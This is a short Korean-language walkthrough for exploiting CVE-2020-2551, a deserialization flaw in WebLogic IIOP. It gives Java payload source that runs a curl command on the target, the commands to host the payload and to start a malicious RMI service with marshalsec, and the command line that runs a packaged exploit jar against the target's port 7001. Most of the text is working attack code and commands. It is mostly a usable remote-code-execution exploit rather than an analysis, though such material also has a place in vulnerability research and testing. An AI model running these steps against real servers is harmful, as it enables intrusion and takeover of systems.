
Weblogic IIOP CVE-2020-2551
Weblogic IIOP 역직렬화
Weblogic10.3.6+jdk1.6
패키징된 jar 파일 추출 코드:a6ob
jar 파일을 다운로드한 후 marshalsec을 사용하여 악성 RMI 서비스를 시작하고 로컬에서 exp.java를 컴파일합니다.
package payload;
import java.io.IOException;
public class exp {
public exp() {
String cmd = "curl http://172.16.1.1/success";
try {
Runtime.getRuntime().exec(cmd).getInputStream();
} catch (IOException e) {
e.printStackTrace();
}
}
}
weblogic과 동일한 jdk 버전 및 종속 라이브러리(wlfullclient.jar)를 사용하여 컴파일하는 것이 좋습니다. 그런 다음 로컬에서 웹 서버를 시작합니다.
python -m http.server --bind 0.0.0.0 80
명령줄에서 jar 파일 실행
java -jar weblogic_CVE_2020_2551.jar 172.16.1.128 7001 rmi://172.16.1.1:1099/exp
실제 효과는 아래와 같습니다.

많은 분들이 재현에 실패했다고 말합니다. 인터넷의 일부 글을 보니 IIOP에 NAT 모드 문제가 있는 것으로 확인되었습니다. 오늘 先知(선즈)에서 이 내용을 발견했습니다: https://xz.aliyun.com/t/7498 각자 직접 확인해 보세요.